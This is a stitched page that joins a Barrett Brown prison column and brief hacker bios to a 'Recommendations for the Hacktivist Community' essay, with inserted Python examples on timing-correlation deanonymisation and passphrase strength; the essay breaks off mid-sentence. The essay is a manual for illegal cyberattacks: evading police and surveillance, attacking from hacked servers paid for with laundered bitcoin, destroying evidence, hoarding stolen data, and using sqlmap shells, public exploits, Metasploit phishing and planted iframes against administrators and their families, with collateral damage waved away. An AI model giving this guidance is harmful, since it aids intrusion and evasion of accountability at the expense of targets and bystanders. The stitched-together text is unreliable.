As for me, I’d rather rip off my own balls and mail them to Stratfor as restitution than set foot in a third-rate state like Oklahoma, regardless of what wonders may lie at the end of that particular rainbow, so it’s a fine thing that I was just going down the road to the Fort Worth Federal Correctional Institution, which will be my home for the next, er, two years. I know little of Fort Worth other than that it’s a lawless haven for half-caste Indian fighters and shiftless part-time cowhands looking to blow their greenbacks and Comanche scalps at one of the town’s countless Chinese-run opium dens, nor am I bothered by the possibility that what little I do know about the town may be 130 years out of date and racist. But I specifically requested that I be sent to this benighted city’s federal prison. For one thing, I’d already “toured the campus,” as it were, shortly after my arrest, when I spent two months at FCI Fort Worth’s jail unit so that the resident psychologists could subject me to a competency evaluation. (Based on their report, Judge Sam Lindsay declared me competent to participate in a trial, which is more than I can say for Judge Sam Lindsay.)

Fort Worth is also the only federal prison aside from FCI Seagoville that’s located near Dallas, and I’m pretty sure I’m still banned from that one, as noted in a prior column, and naturally I want to be close to my parents so that they can visit me with some regularity. My mom, a writer and editor and former flight attendant and South Texas beauty queen who once took me on a vacation to see a swimming pig at a place called Aquarena Springs, is a valuable fountainhead of media gossip, including which outlets are currently going down in flames (The New Republic, as it turns out), and always makes sure to let me know whether and to what extent my haircut is inadequate. Sometimes, if I happen to have a pimple, she insists on popping it right then and there in the visiting room, right in front of the other criminals. Note that I am 33 years old and, arguably, a hardened convict.

Likewise, my dad is my chief source of information regarding plot developments in what I gather to be a popular television program called The Blacklist, new episodes of which he details to me at great length at every opportunity, although I have never asked him for these reports or expressed any interest in the show whatsoever. Incidentally, when I was a kid, he took me on five different occasions to see a film called Hard Target in which the protagonist, ably portrayed by Jean Claude van Damme, finds himself hunted for sport by a wealthy fellow and his mercenary squad of professional trackers, all of whom he ends up killing in turn. My dad also gave me a promotional poster for this movie and, for years afterward, would turn to me and solemnly proclaim the film’s tagline, “Don’t hunt what you can’t kill,” which I suppose is as good advice as any.

Last time he came for a visit, he began to relate to me, apropos of nothing, the nature and potential killing power of some sort of subterranean supervolcano located at Yellowstone and the general circumstances under which it will someday explode and kill a great majority of North Americans, an event which he prophesied with obvious relish. It’s not that he’s one of those ecological mystics who despise humanity and long to see Mother Earth fight back against the ravages of industrial sentience or some such irritating thing. Quite the contrary. In my younger days, he would often drag me around East Texas and command me to assassinate deer and wild boars with rifles he would supply for the purpose, even though I had no ideological differences with any of these animals, and one time, when I was 17, he took me to East Africa to help him exploit the resident natural resources alongside a group of ex-military adventurers with whom we had somehow managed to attach ourselves (this expedition failed rather spectacularly), and lately he seems to have gotten involved in fracking. So he’s certainly no partisan of Nature. It’s just that he’s fond of power in its rawest forms, and if he smiles at the prospect of 400 million deaths, it is only because he feels that man is insufficiently reverent of this particular supervolcano, this god-made-manifest, which therefore has no choice but to lash out against us as punishment. He’s also a longtime pillar of the Dallas Safari Club and on at least one occasion of which I am aware was literally almost eaten by a lion. I could go on and on. Thankfully my parents are divorced, and so I usually only have to deal with these hyperactive Southern Gothic archetypes one at a time these days. Occasionally, though, they set aside their differences in order to come harass me together, and I eventually emerge from the visitation room looking haunted.

I wasn’t taken straight to Fort Worth from Kaufman County, as that would be too quick and easy and cost effective, the prison being less than a half-hour’s drive away; rather, I was taken to the federal courthouse in downtown Dallas to wait for another ride to the Mansfield jail, where I’d already spent much of 2013, and from which I’d eventually be taken to Fort Worth next time a U.S. Marshal happened to be going in that general direction. At the end of the day’s no doubt majestic federal court proceedings, I was placed back in the chew-your-arm-off-and-only-then-shall-I-give-you-the-key van for the ride over to Mansfield. In the rusty cage next to mine were two girls, shackled like I was, who had been to court that afternoon. One had been crying; she’d just been sentenced to eight years for conspiracy to distribute marijuana despite having originally been given reason to expect considerably less time, as she’d cooperated with the FBI. The agents had clearly found her testimony helpful, as they’d met with her a second time, but nonetheless they’d neglected to ask the judge for the sentence reduction they’d promised her in exchange. Like most drug dealers, this girl was in the habit of making and keeping bargains on the strength of her word and expected others to do likewise, but then she’d never dealt with the FBI before.

Just as she finished sobbing out her story, something rather incredible happened: the U.S. Marshal who was driving us back to the jail, having been listening to this account, apparently decided that he was sick of serving as another cog in a fascist system that literally places females in chains and ruins their lives over consensual non-crimes like selling marijuana, because he pulled over, stepped out of the van, came around the back, unlocked the girl’s cage, removed her chains and leg irons and handcuffs, gave her all the cash he had on him, kissed her on the forehead, and advised her to hitchhike to Mexico and then catch a flight to Europe, where she’d have another chance at life, far away from the all-seeing state that had sought to deprive her of her youth and freedom.

Just kidding. Actually he drove us to the jail while the girl cried in her cage.

***

Quote of the Day:

“Truth does not often escape from palaces.” —William Durant

***

Editor’s note: Barrett Brown has been incarcerated since September 2012. Go here to read earlier installments of “The Barrett Brown Review of Arts and Letters and Jail.” If you’d like to send him a book, here’s his Amazon wish list.

Barrett Brown #45047-177
FCI Fort Worth
P.O. Box 15330
Fort Worth, TX 76119

 

YTCracker – Hacker, Rapper, Activist

Bryce Case, Jr., otherwise known as YTCracker, is a “former” cracker most known for defacing the webpages of several federal and municipal government websites in the United States, as well as several in private industry at the age of 17.

Christopher Doyon – Hacker

Chris Doyon (alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.

Gary McKinnon – Hacker

Gary McKinnon (born 10 February 1966) is a Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the public.

Recommendations for the Hacktivist Community

Statement of Purpose

I have been observing the hacker and hacktivist communities, at times very
closely, for many years. The exact definition of “hacker” and “hacktivist”
varies from author to author, so I shall make my interpretation of these words
very clear. Let us define a “hacker” as someone who utilizes their knowledge of
computers and of computer networks to make money via illegitimate means. Let us
define a “hacktivist” as someone who utilizes their knowledge of computers and
of computer networks to do justice when justice is not done by the state. I
have found that these two communities are inextricably linked, yet remain
completely separate entities. Many hackers double as hacktivists in their spare
time, although most hacktivists do not fancy themselves hackers.

Although hackers turned hacktivists have the very best of intentions, and their
input and expertise is of great value to the hacktivist community, they have
inadvertently suppressed the potential of the very community they are trying to
aid. The get-in-get-the-goods-get-out methodology of the stolen credit card
driven hacker community that has been transferred to the hacktivist community
via ideological osmosis has tragically affixed blinders to it. It has caused
the hacktivist community to think linearly and strive to do nothing more than
to blindly infiltrate target organizations and immediately leak whatever data
they happen to stumble across. This must change. Stealing and leaking data
makes a point, but it is sometimes necessary to do more than just make a point,
to inflict real, measurable damage. In certain, extreme cases an organization’s
disregard for human rights warrants its immediate and complete obliteration.

In this essay, I will discuss a multitude of ideological, operational, and
technical changes that ought to be made to the hacktivist community. These
proposed changes have been derived from my personal observations. Some will
find the ideas contained within this document to be the product of common
sense. I have found these people to be few in number. If the community accepts
my suggestions it will not only become more effective, but the risks associated
with participating in it will be drastically lowered. My intent in writing this
is not to aid criminals, but rather to aid people who wish to do battle with
governments and corporations that have become criminals. If freedom is to
remain on this earth, its people must be willing and able to take arms to
defend it, both physical and digital.

Personal Security

Sound operational security is the foundation from which all effective
cyber-offensives are launched. You should, at all times, put your own, personal
security above the success of your operations and interests. The security
precautions taken by most hacktivists I have met are mediocre at best, and
needlessly so. Maintaining sound personal security is by no means difficult. It
requires much caution but very little skill. I have devised a series of
security precautions that hacktivists should take and divided them up into six
main categories: environmental, hardware, software, mental, pattern related,
and archaeological. We shall examine each individually.

(1) Environmental:

There are but two places you can work: at home or in public. Some people insist
that working at home is best and others insist that working in public is best.
The proper working environment debate has been raging on in the hacker
community for quite some time now, and has great relevance to the hacktivist
community, as most governments view hackers and hacktivists as one and the same.
Proponents of the “work in public” argument claim that by always working at a
different public location, you significantly lower your chances of being
apprehended. They argue that even if the authorities are able to trace many of
the cyber-attacks you took part in back to the public places where you took
part in them from, that does not bring them any closer to finding you. Most
retail stores and coffee shops do not keep surveillance footage for more than a
year at the most, and even if the authorities are able to get a photo of you
from some security camera, that does not necessarily lead them directly to your
front door, especially if you wore a hoodie the entire time you were working
and the camera never got a clear shot of your face. On the other hand,
proponents of the “work at home” argument argue that the risk of being seen and
reported, or merely recorded while working in a public place far outweighs the
benefits of the significantly large increase in anonymity that working in
public provides. Both sides have legitimate points, and I urge you to consider
both of them.

If you decide to work in public, the number one threat you face is other
people. Numerous large criminal investigations have been solved using the
observations of average everyday citizens who just happened to remember seeing
something suspicious. If people sense that you are trying to hide something,
they will watch you more closely than they would otherwise. It is important to
always “keep your cool” as the old saying goes. Always try to sit in such a way
that your screen is facing away from the majority of the people in the room you
are sitting in. Corners are your friend. Try to blend in with the crowd. Dress
in plain clothes. Draw no attention. If you are in a coffee shop, sip some
coffee while you work. If you are in a burger joint, buy a burger. If you are
in a library or book store, set a few books beside your laptop. Also, be very
aware of security cameras, both inside the establishment you are working in as
well as on the street near it. Being captured on film is alright as long as the
camera cannot see what is on your screen. Some store cameras are watched by
actual people who will undoubtedly report you if they find out what you are
doing. More and more governments are starting to place very high quality CCTV
cameras on their streets to monitor their citizens, and these devices can be a
problem if they are peering over your shoulder through a window you are sitting
beside. When working in public, it is possible that you may have to confront a
law enforcement officer face to face. Law enforcement officers can smell
uneasiness from a mile away, and if you look like you are up to no good it is
possible that a cop will come and talk to you. Always have some sort of cover
story made up before you leave home to explain why you are where you are. If
you are forced to confront a law enforcement officer you should be able to talk
your way out of the situation.

If you decide to work at home, the number one threat you face is your own ego.
Just because you are at home does not mean that your working environment is
secure. Be aware of windows in close proximity to your computer as well as your
security-illiterate or gossipy family members. Security issues in relation to
network configuration begin to come into play when you work at home. If your
computer were to somehow get compromised while you are working at home,
perhaps by your government, it would be nearly impossible for the person or
group of people rummaging around inside of your system to get your actual IP
address (provided that you adhere to the software security guidelines that we
will discuss later). However, if your wi-fi password (or the name of your
printer, or the name of another computer on the network) contains your actual
last name and part of your address, tracking you down becomes very easy. A lot
of people name their network devices and structure their network passwords in
this way.

It is also possible that if an attacker who has infiltrated your computer
notices other machines on your network they can pivot to them (infect them with
malware using your computer as a spring board of sorts) and use them to get
your IP address. A lot of Internet enabled household devices have cameras on
them (your smart TV, your Xbox, and your high tech baby monitor to name a few)
and said cameras can potentially be leveraged against you. It is in your best
interest to not have any other machines running on your home network while you
are working. Also, change your wi-fi password every once in a while and make
sure that the password on the administrative interface of your router is
something other than the out-of-the-box default. If your computer gets
compromised, logging into your router using username “admin” and password
“admin” is elementary for a moderately skilled attacker. Most modern routers
list their WAN IP address on their control panels.

Regardless of where you decide to work, be aware of mirrors and glass picture
frames near your workplace. In the right light, both of these items have the
potential to reflect crystal clear images of your screen to onlookers across
the room. In addition to this, understand that modern cell phones are your
worst enemy. Not only are they always going to be the weakest link in your
security setup, but if they are somehow compromised they are equipped with a
camera and microphone. Recent studies suggest that it is possible for smart
phones to listen to the high pitched noise your CPU makes and deduce your PGP
private key. Furthermore, the metadata collected by your phone coupled with
pattern analysis techniques could potentially allow your government to link
your real life and online personas together after some time. We will discuss
this in depth later. Leave your phones at home and if possible keep all phones,
yours or otherwise, far away from your computer. Other portable devices such as
iPods and tablets potentially pose the same risk that phones do and should be
treated the same.

(2) Hardware:

Modern computers come equipped with microphones, speakers (which can be used as
microphones under the right circumstances), and cameras. All of these features
can potentially be leveraged to identify you if your computer is compromised.
To mitigate these risks, these features should be physically removed. Your
computer’s microphone and speakers should be ripped out of it, but you should
not rip out your web cam, as it will alter the outward appearance of your
computer and potentially draw attention to you. Instead, open your computer’s
screen and snip the wires that connect to your web cam. Wrap the ends of the
wires in electrical tape so sparks do not jump in between them. If you must
listen to an audio file while working, use headphones. Only keep your
headphones plugged into your computer when you are using them. The computer you
use for your hacktivist activities also should not contain a hard drive, as
they are unnecessary for our purposes.

(3) Software:

Always use a TOR enabled Linux live system when working. At the present moment,
Tails (The Amnesic Incognito Live System) is by far the best live distribution
for your purposes. You can read more about TOR at www.torproject.org and you
can read more about acquiring, setting up, and using Tails at tails.boum.org.
The Tails operating system lives on a USB flash drive. Every time you start up
your computer, you must first insert your Tails flash drive into it. The Tails
website will guide you through making said flash drive. Tails will
automatically direct all of your outgoing traffic into the TOR network in an
effort to hide your IP address. If you use Tails you will be completely
anonymous and be able to work with impunity provided that:

* You keep your Tails USB up to date. New versions of the Tails
operating system are released every few months.

* You do not login into your “real world” accounts while using Tails.
Do not check your Twitter feed while you are working.

* You do not use Tails to create an account with an alias that you have
used before. If you have been “0pwn” for the past seven years, now
is a good time to stop being 0pwn.

* You do not alter Tails’ default security settings. They are the way
they are for a reason.

* You do not use Tails to create an online account with a password that
you have used before. Doing this only makes deanonymizing you easier.

* You do not install and use random packages that “look cool”; they
could be malicious. Only use packages and scripts that you trust.
Tails is not bullet proof.

* If you decide to set a sudo password when starting up Tails, make
sure that it is very strong.

* You stay conscious of metadata analysis techniques. We will discuss
these later.

* You switch exit nodes every ten to fifteen minutes. This can be done
by double clicking the little green onion in the upper right hand
corner of your Tails desktop and hitting the “Use a New Identity”
button.

* You follow the communication guidelines laid out later in this
document.

More information can be found on the Tails warning page:
https://tails.boum.org/doc/about/warning/index.en.html. Be aware that it is very
easy for your ISP (which is probably working closely with your government) to
tell that you are using both TOR and Tails. It is probably in your best interest
to use something called “TOR bridge mode”. You can read more about how to
configure Tails to use TOR bridges here:
https://tails.boum.org/doc/first_steps/startup_options/bridge_mode/index.en.html.

Tails is unique in that it has a special feature that wipes your computer’s
memory before it shuts down. This is done in order to mitigate risks associated
with the dreaded “cold boot attack” (a forensic method in which a suspect’s RAM
is ripped out of his or her computer and then thrown into a vat of liquid
nitrogen to preserve its contents for later analysis). This feature is also
triggered if you pull your Tails flash drive out of your computer while you are
working. If while you are working you ever feel that the authorities are about
to move in on you, even if you have a seemingly irrational gut feeling, yank
your Tails flash drive out of your computer. Tails also has a feature that
allows it to disguise itself as a Windows desktop. Using this feature in
public will reduce your risk of capture significantly.

(4) Mental:

A skilled attacker is well disciplined and knows that he must keep his actions
and skills a secret in order to remain safe from harm. Do not flaunt the fact
that you are dissatisfied with your government, a foreign government, or a
particular corporation. Do not attend protests. Do not publicly advertise the
fact that you have an above average aptitude for computer security offensive or
otherwise. And whatever you do, do not tell anyone, even someone you think you
can trust, that you are planning to launch an organized cyber-attack on any
organization, big or small. If you draw attention to yourself no amount of
security precautions will keep you safe. Keep your “real” life mentally
isolated from your “hacktivist” life. One lapse in operational security could
end you.

Be alert and focused. Remain mentally strong. Come to terms with the illegality
of your actions and what will happen to you if you are apprehended. As a wise
man once said, “A warrior considers himself already dead, so there is nothing
to lose. The worst has already happened to him, therefore he’s clear and calm;
judging him by his acts or by his words, one would never suspect that he has
witnessed everything.” It is perfectly acceptable to be paranoid, but do not
let that paranoia consume you and slow your work. Even if you are extremely
cautious and follow this document’s advice to the letter, you still may be
hunted down and incarcerated, tortured, or killed. Some countries do not take
kindly to hacktivists. It is best that you be honest with yourself from the
beginning. In order to operate effectively you must be able to think clearly
and see the world as it actually is.

(5) Pattern Related:

When your online persona is active your real life persona ceases to exist, and
an observant adversary can use this to their advantage. If your ISP, bank, and
mobile phone provider are “cooperating” with your government and allowing them
to browse through all of their records (a fair assumption in this day and age)
then, eventually, they will be able to deduce your real identity by comparing
everyone’s data to information about your online persona. If the government
looks back on all of the records they have collected in the past year and
notices that you never make a credit card purchase, watch Netflix, go on your
Facebook, Google, or Twitter account, or change your physical location while
1337Hax0r64 is online on some anti-government forum on the deep web, they will
assume that you are 1337Hax0r64. Even information about your home network’s
bandwidth usage can give away your real identity.

Luckily, performing the type of metadata analysis attack described above takes
time, usually many months. It is very important that you change aliases often,
preferably every three or four months. Shed your old names like a snake sheds
its skin. When you do change your online name, make sure your new identity
cannot be tied back to your old one.
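
The correlation described in the two paragraphs above, as an added example that is not part of the original document: an observer holding ISP, bank and telco records scores how exclusively a persona's online windows alternate with each candidate subscriber's real-world activity, and how likely that exclusivity is by pure chance, which is why the attack needs months of records before it becomes convincing. All subscriber names, windows and timestamps below are constructed.

```python
"""Timing-correlation attribution: compare the windows in which a persona was
online against each candidate's real-world activity records. Added example,
not part of the original document; all identifiers, intervals and timestamps
are constructed."""
import math
from typing import Dict, List, Tuple

Interval = Tuple[int, int]  # (start, end) in minutes, half-open

# Constructed: observation horizon and the minutes during which the persona
# "1337Hax0r64" was seen online on the forum.
OBSERVATION_MINUTES = 2000
PERSONA_SESSIONS: List[Interval] = [(60, 180), (600, 720), (1500, 1620)]

# Constructed: timestamps of real-world events per candidate subscriber
# (card purchases, personal-account logins, phone location changes).
CANDIDATE_EVENTS: Dict[str, List[int]] = {
    "subscriber_A": [10, 90, 130, 650, 700, 1400, 1550],
    "subscriber_B": [20, 40, 250, 500, 800, 1300, 1700, 1900],
    "subscriber_C": [100, 400, 650, 1000, 1610],
}


def inside(t: int, sessions: List[Interval]) -> bool:
    """True if minute t falls within one of the persona's online windows."""
    return any(start <= t < end for start, end in sessions)


def exclusivity_score(events: List[int], sessions: List[Interval]) -> float:
    """Fraction of a candidate's real-world events that fall OUTSIDE the
    persona's online windows. 1.0 is the tell-tale pattern: the candidate is
    never active in the real world while the persona is online."""
    if not events:
        return 0.0
    outside = sum(1 for t in events if not inside(t, sessions))
    return outside / len(events)


def online_fraction(sessions: List[Interval], horizon: int) -> float:
    """Share of the observation period the persona spent online (assumes the
    windows do not overlap)."""
    return sum(end - start for start, end in sessions) / horizon


def chance_probability(n_events: int, n_inside: int, p_online: float) -> float:
    """Probability that at most n_inside of n_events independent real-world
    events land inside online windows by coincidence (binomial tail). A
    perfectly exclusive candidate with only a handful of events is still a
    plausible coincidence; the evidence sharpens as records accumulate."""
    return sum(
        math.comb(n_events, i) * p_online ** i * (1 - p_online) ** (n_events - i)
        for i in range(n_inside + 1)
    )


def rank_candidates(candidates: Dict[str, List[int]], sessions: List[Interval],
                    horizon: int) -> List[Tuple[str, float, float]]:
    """Return (name, exclusivity, chance) with the most suspicious candidate
    first: highest exclusivity, then lowest chance probability."""
    p = online_fraction(sessions, horizon)
    rows = []
    for name, events in candidates.items():
        n_inside = sum(1 for t in events if inside(t, sessions))
        rows.append((name, exclusivity_score(events, sessions),
                     chance_probability(len(events), n_inside, p)))
    return sorted(rows, key=lambda r: (-r[1], r[2]))


if __name__ == "__main__":
    for name, excl, chance in rank_candidates(
            CANDIDATE_EVENTS, PERSONA_SESSIONS, OBSERVATION_MINUTES):
        print(f"{name}: exclusivity={excl:.2f} chance={chance:.3f}")
```

With the constructed data subscriber_B is the only perfectly exclusive candidate, yet eight events give a coincidence probability of roughly 0.20; only many more records drive that figure toward zero.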

DO NOT launch cyber-attacks from your own computer. Launch attacks only
from hacked servers, servers purchased with washed bitcoins, or free shell
accounts. Certain types of cyber-attacks produce a large amount of traffic over
a short amount of time. If the bandwidth usage of your home network spikes at
the same instant that a government or corporate server is attacked, the time it
takes to deanonymize you is reduced significantly. This is especially true if
you launch multiple attacks on multiple occasions. Launching attacks in this
way can be mentally exhausting. Configuring a new attack server with your tool
set every time your old attack server is banned (an inevitable occurrence) can
be a tedious task indeed. I personally recommend creating a bash script to
automatically install your favorite tools to make this transition process
easier. Most hackers and offensive security professionals use under thirty
non-standard tools to do their job, so configuring a new server with everything
you need should not take very long if you know what you are doing. Consider
equipping your server with TOR and a VNC server (for tools that require GUIs
such as most popular intercepting proxies) as well.

(6) Archaeological:

You must ensure that there is no forensic evidence of your actions, digital or
otherwise. If the government breaks into your house and rummages through your
things, they should find nothing interesting. Make sure that you never make any
physical notes pertaining to your hacktivist activities. Never keep any
computer files pertaining to your hacktivist activities in your home. Keep all
of your compromising files, notes, scripts, and unusual attack tools (the ones
that can not be installed with apt-get or the like), and stolen information in
the cloud. It is recommended that you keep all of your files backed up on
multiple free cloud storage providers so that in the event that one of the
providers bans your account you still have all of your data. Do not name your
cloud accounts in such a way that they can be connected back to your online
persona. Never, under any circumstances, mention the names or locations of your
cloud accounts to the people you work with. Always hit the “Use New Identity”
button on your TOR control panel after accessing your cloud storage solutions.
Every time you shed your old alias, shed your old cloud accounts.

Security of Communications

The majority of hacktivists I have met communicate via public IRC. Using IRC is
fine for meeting other hacktivists, but as soon as you muster a team of other
hacktivists who wish to attack the same target as you, move to another more
secure form of communication. Some means of communication are more secure than
others, but completely secure communication does not exist. The following
guidelines are meant to work in conjunction with the personal security
guidelines that were discussed in the previous section. If proper personal
security measures are implemented effectively, compromised communication will
result in operational failure at worst and not complete deanonymization. Since
operational failure may very well set you and your cause back several months,
it is in your best interest to attempt to communicate securely:

* Remember that any of the people you meet on the clearnet, deep web,
or public IRC channels who claim to be on your side could actually
be government agents trying to sabotage your operations.

* If possible, communicate mainly via privacy friendly email accounts
(not Gmail, Yahoo, AT&T, etc.) and encrypt all of your messages with
PGP. When a cyber-attack is being carried out it is often necessary
to be able to communicate with your accomplices instantaneously.
Since encrypting, sending, receiving, and decrypting messages by hand
takes time, using PGP in time sensitive situations like this is not
feasible. If you have to confer in an IM environment, use a program
like TorChat that uses its own form of asymmetric encryption to send
and receive messages instantly.

* Use strong passwords for all of your online accounts. The best way to
make a strong password is to pick eight or nine random words and
string them together. Passwords like this are easy to remember but
hard to guess.

* Never give away any personal information (such as country, interests,
hobbies, health, etc.) or give insight into your feelings or
emotions. Your fellow hacktivists are not your friends and should
never be talked to as such. Giving away this sort of information will
make tracking you easier.

* When you receive messages, do not retain them, even if they are
encrypted. Read them, make note of any hard to remember details
(like long server passwords for example), and then delete them.
Having a mile long digital paper trail cannot lead to anything good.
In some cases deleted messages on email servers can be recovered via
computer forensics, but deleting messages quickly may reduce the odds
that they can be.

* When typing messages, do so in a word processor on your computer.
Never write your message inside of a communication program (such as
an online email client, forum PM box, etc.). People have been known
to accidentally send unencrypted messages before. The effects of such
an error can be devastating.

* If you find yourself writing large swaths of text intended for public
release (like essays or manifestos) use a tool like Anonymouth to
obscure your writing style. Your writing style is as unique as a
finger print and can be used to identify you.

* Never, under any circumstances, execute a file on your computer or on
your server that has been given to you by a fellow hacktivist. You
should never run into a situation where doing this is necessary.

* Do not disclose information about your involvement in previous
hacktivist operations to people who were not also part of the same
operation.

* If one of the people that you are working with gets captured, assume
that the people who have captured them know everything that they do.
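
The passphrase guideline above, put in numbers as an added example that is not part of the original document: eight or nine words picked at random from a large list against a short random character password. SAMPLE_WORDS is a constructed list for offline use only; DICEWARE_LIST_SIZE is the size of the standard Diceware list (6^5 = 7776 entries) and is used purely for the entropy arithmetic.

```python
"""Entropy of a random-word passphrase versus a short character password.
Added example, not from the original document. SAMPLE_WORDS is constructed;
a real passphrase must be drawn from a list of thousands of words."""
import math
import secrets
from typing import Dict, Sequence

DICEWARE_LIST_SIZE = 7776  # 6^5 entries in the standard Diceware list
PRINTABLE_ASCII = 95       # letters, digits and punctuation on a US keyboard

# Constructed sample list for demonstration only.
SAMPLE_WORDS: Sequence[str] = (
    "anchor", "basil", "cobalt", "dune", "ember", "fjord", "gravel", "hazel",
    "iris", "juniper", "kelp", "lumen", "marble", "nectar", "orbit", "pebble",
    "quartz", "ridge", "saffron", "tundra",
)


def entropy_bits(choices_per_pick: int, picks: int) -> float:
    """Entropy of a secret built from `picks` independent uniform choices."""
    if choices_per_pick < 2 or picks < 1:
        raise ValueError("need at least two choices and one pick")
    return picks * math.log2(choices_per_pick)


def years_to_exhaust(bits: float, guesses_per_second: float) -> float:
    """Years needed to try every possibility at the given guess rate."""
    return 2 ** bits / guesses_per_second / (365.25 * 24 * 3600)


def generate_passphrase(word_count: int, words: Sequence[str] = SAMPLE_WORDS) -> str:
    """Pick words with the OS CSPRNG. "Random" in the guideline means this,
    not words chosen by hand, which are far more predictable."""
    if word_count < 1:
        raise ValueError("word_count must be positive")
    return " ".join(secrets.choice(words) for _ in range(word_count))


def compare(word_count: int = 8, password_length: int = 10,
            guesses_per_second: float = 1e12) -> Dict[str, float]:
    """Entropy and exhaustive-search time for a word passphrase versus a
    random printable-ASCII password of the given length."""
    pp_bits = entropy_bits(DICEWARE_LIST_SIZE, word_count)
    pw_bits = entropy_bits(PRINTABLE_ASCII, password_length)
    return {
        "passphrase_bits": pp_bits,
        "password_bits": pw_bits,
        "passphrase_years": years_to_exhaust(pp_bits, guesses_per_second),
        "password_years": years_to_exhaust(pw_bits, guesses_per_second),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value:.3g}")
    print(generate_passphrase(9))
```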

Philosophy of Attacking

The hacktivist community, like every community, has its own unique set of
philosophical musings, taboos, and dogmas. While I do not advocate the severe
alteration of the principles and philosophies on which the community was built,
I do wish to point out a number of flaws in certain aspects of their
composition. These flaws serve only to hold back the community and should be
openly discussed.

(1) When hacktivists target an organization, their goal is more often than not
to force said organization to stop functioning permanently, or at least for the
longest time possible, in an effort to stall unjust actions from being carried
out or to seek retribution for unjust actions done in the past. Leaking
databases, DoXing influential individuals, defacing websites, and launching
massive DDoS campaigns, four of the modern hacktivist community’s favorite
activities, accomplish this goal – to an extent. Infiltrating a target
organization and sowing discord within its ranks is magnitudes more effective
than leaking credit card numbers or putting a CEO’s social security number on
Pastebin, yet it is rarely, if ever, considered to be a viable course of
action. Subtly and silently fostering suspicion and distrust inside of your
target will have a longer lasting impact than simply pointing out that its
security policy has some weak points.

(2) Hacktivists crave publicity, yet they are the most effective when they
operate undetected. Stay hidden. Although it may seem tempting at times, do not
destroy large amounts of information on your target’s computers or servers.
Doing so will announce your arrival inside of your target’s network rather
loudly. Flashy, public displays of power have no place in the hacktivist
community. Just because you are hiding behind TOR does not mean that you should
not make an effort to cover your tracks. Conceal your attack not to mask your
identity, but to convince your target that no attack was carried out in the
first place.

(3) Once your hacktivist collective has decided to attack an organization,
strike fast and strike hard. Overwhelm your target. A well disciplined and well
organized team of attackers can penetrate most networks within a few hours.
Far too often I have seen hacktivist collectives declare all out war on someone
and then attack them slowly and gain entry into their network days, sometimes
even weeks later. By attacking slowly, you give your target time to react and
strengthen their defenses. Detecting an attack from a large hacktivist
collective is a trivial task, but as history has shown detecting the presence
of one inside of a network, especially a large network, can be tricky.

(4) Cyber-attacks seldom go as planned. If you are attempting to do anything
that involves the coordination of more than two people, keep this in mind. It
is not uncommon for tools to stop working in the middle of an attack. It is not
uncommon for reverse shells to die unexpectedly. It is not uncommon for
seemingly simple actions to take hours to perform. You must be ready to think
on your feet and quickly adjust your attack plan to accommodate the ever
changing conditions within the network you are attacking. Predefined
contingency plans are mostly useless.

(5) Remember that no system is impenetrable. On more than one occasion I have
seen hacktivists give up on trying to infiltrate a target network because their
Nessus scan did not yield any useful results. As a hacktivist, you are not
bound by the typical constraints of a pentester. If you can not successfully
attack a website, try attacking its hosting provider. Try attacking the
administrator’s email account. Try going after random social accounts belonging
to the administrator’s family. Try planting iframes in websites you suspect the
administrator frequents in an effort to infect him. If you cause extensive
collateral damage, who cares? It is not your problem. Sometimes the ends
justify the means. Be creative.

(6) Many hacktivists possess unrealistic, self-constructed mental images of the
ideal cyber-attack. In the majority of these movie-induced delusions, the ideal
attack utilizes numerous 0days, an arsenal of home made tools, and highly
advanced, unimaginably complex network intrusion techniques. In reality, this
type of thinking is incredibly dangerous and causes some hacktivists to attempt
to perform convoluted, elaborate attacks to gain the respect of their peers.
When breaking into highly secured networks, such attacks only draw unnecessary
attention. The best attacks are the ones that work. They are usually simple and
take little time to execute. Using sqlmap to spawn a shell on your target’s
server by exploiting a flaw in their website’s search feature is a viable if
not ideal attack. It allows you to access the inside of your target’s network.
Exploiting a vulnerable FTP daemon on one of your target’s servers using public
exploit code is a viable if not ideal attack. It allows you to access the
inside of your target’s network. Using Metasploit in conjunction with a fresh
Gmail account to launch a phishing campaign against your target’s employees is
a viable if not ideal attack. It allows you to access the inside of your
target’s network. The media hates it when hacktivists use open source software
to do their work. Whenever a hacker or hacktivist is arrested for doing
something that involved using “someone else’s” tools, they are publicly
shamed. “Anyone could have done that” they say. “He’s just an unskilled script
kiddie” they say. Claiming that someone is less of a hacker solely because they
partially depend on someone else’s code borders on absurd. It amounts to
claiming that Picasso is a bad artist because he did not carve his own brushes,
synthesize his own paints, and weave his own canvas. Do not shy away from using
open source tools and publicly available information to accomplish your goals.
Hacking is an art, and nmap is your brush.

Organization and Formation

Most of the hacker and hacktivist groups I have observed are unorganized and
undisciplined. They claim to perform actions as a collective, yet when it comes
time to actually launch an attack they attempt to infiltrate their targets as
individuals, each member launching attacks of their own without making the
faintest attempt to coordinate their actions with others. Here I shall describe
a schema that could be easily adopted by any hacktivist collective to allow it
to facilitate highly coordinated attacks involving large numbers of attackers
with great ease. It will be presented as a series of steps.

Step One: Organize yourselves into multiple small groups. These groups shall be
referred to as strike teams. The ideal strike team is composed of three parts
attack specialists, two parts social engineering specialists. Attack
specialists should at least be able to identify and competently exploit
potential vulnerabilities in websites and be able to exploit vulnerable or
misconfigured services. Social engineering specialists should have at least
some real world experience before participating in a strike team. Attack
specialists should only concern themselves with launching attacks and social
engineering specialists should only concern themselves with social engineering.
Well-defined roles are the key to a strike team’s success. This configuration
will often create an abundance of social engineering specialists, and that is
perfectly acceptable. Having the capability to immediately launch multiple well
planned social engineering campaigns is crucial. The size of a strike team
will be determined by the skill of its members. Highly skilled individuals
should work in very small strike teams (five member teams are acceptable)
whereas unskilled individuals should work in larger strike teams (up to a few
dozen). The organization of strike teams should be coordinated as a collective.
No one person should be given the authority to sort people themselves. Strike
teams should function as “sub collectives” and be autonomous. Hacktivist
collectives are composed of people around the world, most of whom can not be
online all the time. This means that all strike teams should set themselves up
knowing that their members will pop on and offline and that it is possible new
members will have to be annexed at a later time.

Step Two: Within each strike team, agree upon a stratagem: a broad, realistic,
nonspecific plan of action that aims to accomplish one, very specific goal.
Strike teams should only execute one stratagem at a time. Multiple strike teams
within the same hacktivist collective can execute different stratagems at the
same time in an effort to accomplish some sort of final goal (perhaps to
